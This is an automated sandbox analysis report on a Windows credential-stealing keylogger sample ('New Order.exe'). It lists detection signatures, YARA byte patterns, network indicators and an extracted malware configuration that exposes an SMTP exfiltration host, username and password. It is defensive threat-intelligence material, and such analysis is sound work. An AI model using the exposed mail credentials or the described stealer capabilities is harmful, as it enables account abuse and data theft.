Edit tour

Windows Analysis Report
New Order.exe

Overview

General Information

Sample name:	New Order.exe
Analysis ID:	1482087
MD5:	6610a5896fe0895ed5ca90f938906372
SHA1:	b31f809206ea7352a8e2707bece1b087ded10ab1
SHA256:	31c28bce87bf83996ccbd1e7bea5de7a75b5f840df1e108f6792d5b17185da66
Tags:	exeRedLineStealer
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected PureLog Stealer

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Disable Task Manager(disabletaskmgr)

Disables Windows system restore

Disables the Windows task manager (taskmgr)

Found API chain indicative of sandbox detection

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Potentially malicious time measurement code found

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Abnormal high CPU Usage

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

New Order.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\New Order.exe" MD5: 6610A5896FE0895ED5CA90F938906372)

RegSvcs.exe (PID: 7392 cmdline: "C:\Users\user\Desktop\New Order.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "merah2005", "Password": "mail.lenteraandalan.com\n", "Host": "armkmc2017@gmail.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "widi@lenteraandalan.com", "Password": "merah2005", "Host": "mail.lenteraandalan.com\n", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1263248786.00000000014E0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F2 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x37774:$a1: get_encryptedPassword 0x37748:$a2: get_encryptedUsername 0x3780c:$a3: get_timePasswordChanged 0x37724:$a4: get_passwordField 0x3778a:$a5: set_encryptedPassword 0x37557:$a7: get_logins 0x32b41:$a10: KeyLoggerEventArgs 0x32b10:$a11: KeyLoggerEventArgsEventHandler 0x3762b:$a13: _encryptedPassword
00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x353bc:$s1: UnHook 0x35358:$s2: SetHook 0x35391:$s3: CallNextHook 0x35320:$s4: _hook
00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x78ec2:$a1: get_encryptedPassword 0x78e96:$a2: get_encryptedUsername 0x78f5a:$a3: get_timePasswordChanged 0x78e72:$a4: get_passwordField 0x78ed8:$a5: set_encryptedPassword 0x78ca5:$a7: get_logins 0x7428f:$a10: KeyLoggerEventArgs 0x7425e:$a11: KeyLoggerEventArgsEventHandler 0x78d79:$a13: _encryptedPassword
00000002.00000002.3707765175.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F2 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3865c:$a1: get_encryptedPassword 0x38630:$a2: get_encryptedUsername 0x386f4:$a3: get_timePasswordChanged 0x3860c:$a4: get_passwordField 0x38672:$a5: set_encryptedPassword 0x3843f:$a7: get_logins 0x33a29:$a10: KeyLoggerEventArgs 0x339f8:$a11: KeyLoggerEventArgsEventHandler 0x38513:$a13: _encryptedPassword
00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x362a4:$s1: UnHook 0x36240:$s2: SetHook 0x36279:$s3: CallNextHook 0x36208:$s4: _hook
Process Memory Space: RegSvcs.exe PID: 7392	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7392	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 7392	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7392	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x134331:$a1: get_encryptedPassword 0x1a93d7:$a1: get_encryptedPassword 0x1cdeb7:$a1: get_encryptedPassword 0x134305:$a2: get_encryptedUsername 0x1a93ab:$a2: get_encryptedUsername 0x1cde8b:$a2: get_encryptedUsername 0x1343c9:$a3: get_timePasswordChanged 0x1a946f:$a3: get_timePasswordChanged 0x1cdf4f:$a3: get_timePasswordChanged 0x1342e1:$a4: get_passwordField 0x1a9387:$a4: get_passwordField 0x1cde67:$a4: get_passwordField 0x134347:$a5: set_encryptedPassword 0x1a93ed:$a5: set_encryptedPassword 0x1cdecd:$a5: set_encryptedPassword 0x13411d:$a7: get_logins 0x1a91c3:$a7: get_logins 0x1cdca3:$a7: get_logins 0x130588:$a10: KeyLoggerEventArgs 0x1a5509:$a10: KeyLoggerEventArgs 0x1ca10e:$a10: KeyLoggerEventArgs
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.RegSvcs.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F2 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
2.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F2 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.New Order.exe.14e0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F2 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.2.RegSvcs.exe.53e0000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.53e0000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.53e0000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.53e0000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.53e0000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3685c:$a1: get_encryptedPassword 0x36830:$a2: get_encryptedUsername 0x368f4:$a3: get_timePasswordChanged 0x3680c:$a4: get_passwordField 0x36872:$a5: set_encryptedPassword 0x3663f:$a7: get_logins 0x31c29:$a10: KeyLoggerEventArgs 0x31bf8:$a11: KeyLoggerEventArgsEventHandler 0x36713:$a13: _encryptedPassword
2.2.RegSvcs.exe.53e0000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x344a4:$s1: UnHook 0x34440:$s2: SetHook 0x34479:$s3: CallNextHook 0x34408:$s4: _hook
2.2.RegSvcs.exe.5470000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.5470000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.5470000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.5470000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.5470000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.5470000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x37774:$a1: get_encryptedPassword 0x37748:$a2: get_encryptedUsername 0x3780c:$a3: get_timePasswordChanged 0x37724:$a4: get_passwordField 0x3778a:$a5: set_encryptedPassword 0x37557:$a7: get_logins 0x32b41:$a10: KeyLoggerEventArgs 0x32b10:$a11: KeyLoggerEventArgsEventHandler 0x3762b:$a13: _encryptedPassword
2.2.RegSvcs.exe.5470000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x353bc:$s1: UnHook 0x35358:$s2: SetHook 0x35391:$s3: CallNextHook 0x35320:$s4: _hook
2.2.RegSvcs.exe.53e0ee8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.53e0ee8.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.53e0ee8.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.53e0ee8.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2b88866.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2b88866.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.2b88866.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2b88866.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2b88866.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2b88866.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3865c:$a1: get_encryptedPassword 0x38630:$a2: get_encryptedUsername 0x386f4:$a3: get_timePasswordChanged 0x3860c:$a4: get_passwordField 0x38672:$a5: set_encryptedPassword 0x3843f:$a7: get_logins 0x33a29:$a10: KeyLoggerEventArgs 0x339f8:$a11: KeyLoggerEventArgsEventHandler 0x38513:$a13: _encryptedPassword
2.2.RegSvcs.exe.53e0ee8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.53e0ee8.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.5470000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.5470000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.5470000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.5470000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2b88866.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2b88866.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2b88866.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2b88866.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2b88866.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3685c:$a1: get_encryptedPassword 0x36830:$a2: get_encryptedUsername 0x368f4:$a3: get_timePasswordChanged 0x3680c:$a4: get_passwordField 0x36872:$a5: set_encryptedPassword 0x3663f:$a7: get_logins 0x31c29:$a10: KeyLoggerEventArgs 0x31bf8:$a11: KeyLoggerEventArgsEventHandler 0x36713:$a13: _encryptedPassword
2.2.RegSvcs.exe.53e0ee8.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.53e0ee8.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2b88866.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x362a4:$s1: UnHook 0x36240:$s2: SetHook 0x36279:$s3: CallNextHook 0x36208:$s4: _hook
2.2.RegSvcs.exe.53e0ee8.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35974:$a1: get_encryptedPassword 0x35948:$a2: get_encryptedUsername 0x35a0c:$a3: get_timePasswordChanged 0x35924:$a4: get_passwordField 0x3598a:$a5: set_encryptedPassword 0x35757:$a7: get_logins 0x30d41:$a10: KeyLoggerEventArgs 0x30d10:$a11: KeyLoggerEventArgsEventHandler 0x3582b:$a13: _encryptedPassword
2.2.RegSvcs.exe.2b88866.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x344a4:$s1: UnHook 0x34440:$s2: SetHook 0x34479:$s3: CallNextHook 0x34408:$s4: _hook
2.2.RegSvcs.exe.5470000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35974:$a1: get_encryptedPassword 0x35948:$a2: get_encryptedUsername 0x35a0c:$a3: get_timePasswordChanged 0x35924:$a4: get_passwordField 0x3598a:$a5: set_encryptedPassword 0x35757:$a7: get_logins 0x30d41:$a10: KeyLoggerEventArgs 0x30d10:$a11: KeyLoggerEventArgsEventHandler 0x3582b:$a13: _encryptedPassword
2.2.RegSvcs.exe.53e0ee8.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x335bc:$s1: UnHook 0x33558:$s2: SetHook 0x33591:$s3: CallNextHook 0x33520:$s4: _hook
2.2.RegSvcs.exe.5470000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x335bc:$s1: UnHook 0x33558:$s2: SetHook 0x33591:$s3: CallNextHook 0x33520:$s4: _hook
2.2.RegSvcs.exe.53e0ee8.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.53e0ee8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x37774:$a1: get_encryptedPassword 0x37748:$a2: get_encryptedUsername 0x3780c:$a3: get_timePasswordChanged 0x37724:$a4: get_passwordField 0x3778a:$a5: set_encryptedPassword 0x37557:$a7: get_logins 0x32b41:$a10: KeyLoggerEventArgs 0x32b10:$a11: KeyLoggerEventArgsEventHandler 0x3762b:$a13: _encryptedPassword
2.2.RegSvcs.exe.53e0ee8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x353bc:$s1: UnHook 0x35358:$s2: SetHook 0x35391:$s3: CallNextHook 0x35320:$s4: _hook
2.2.RegSvcs.exe.53e0000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.53e0000.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.53e0000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.53e0000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.53e0000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.53e0000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3865c:$a1: get_encryptedPassword 0x38630:$a2: get_encryptedUsername 0x386f4:$a3: get_timePasswordChanged 0x3860c:$a4: get_passwordField 0x38672:$a5: set_encryptedPassword 0x3843f:$a7: get_logins 0x33a29:$a10: KeyLoggerEventArgs 0x339f8:$a11: KeyLoggerEventArgsEventHandler 0x38513:$a13: _encryptedPassword
2.2.RegSvcs.exe.53e0000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x362a4:$s1: UnHook 0x36240:$s2: SetHook 0x36279:$s3: CallNextHook 0x36208:$s4: _hook
2.2.RegSvcs.exe.2b8974e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2b8974e.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2b8974e.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2b8974e.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2b8974e.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35974:$a1: get_encryptedPassword 0x35948:$a2: get_encryptedUsername 0x35a0c:$a3: get_timePasswordChanged 0x35924:$a4: get_passwordField 0x3598a:$a5: set_encryptedPassword 0x35757:$a7: get_logins 0x30d41:$a10: KeyLoggerEventArgs 0x30d10:$a11: KeyLoggerEventArgsEventHandler 0x3582b:$a13: _encryptedPassword
2.2.RegSvcs.exe.2b8974e.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x335bc:$s1: UnHook 0x33558:$s2: SetHook 0x33591:$s3: CallNextHook 0x33520:$s4: _hook
2.2.RegSvcs.exe.2b8974e.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2b8974e.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.2b8974e.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.2b8974e.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2b8974e.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2b8974e.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x37774:$a1: get_encryptedPassword 0x37748:$a2: get_encryptedUsername 0x3780c:$a3: get_timePasswordChanged 0x37724:$a4: get_passwordField 0x3778a:$a5: set_encryptedPassword 0x37557:$a7: get_logins 0x32b41:$a10: KeyLoggerEventArgs 0x32b10:$a11: KeyLoggerEventArgsEventHandler 0x3762b:$a13: _encryptedPassword
2.2.RegSvcs.exe.2b8974e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x353bc:$s1: UnHook 0x35358:$s2: SetHook 0x35391:$s3: CallNextHook 0x35320:$s4: _hook
Click to see the 63 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 103.163.138.29, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7392, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49729

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T18:07:47.380656+0200
SID:	2803305
Source Port:	49709
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

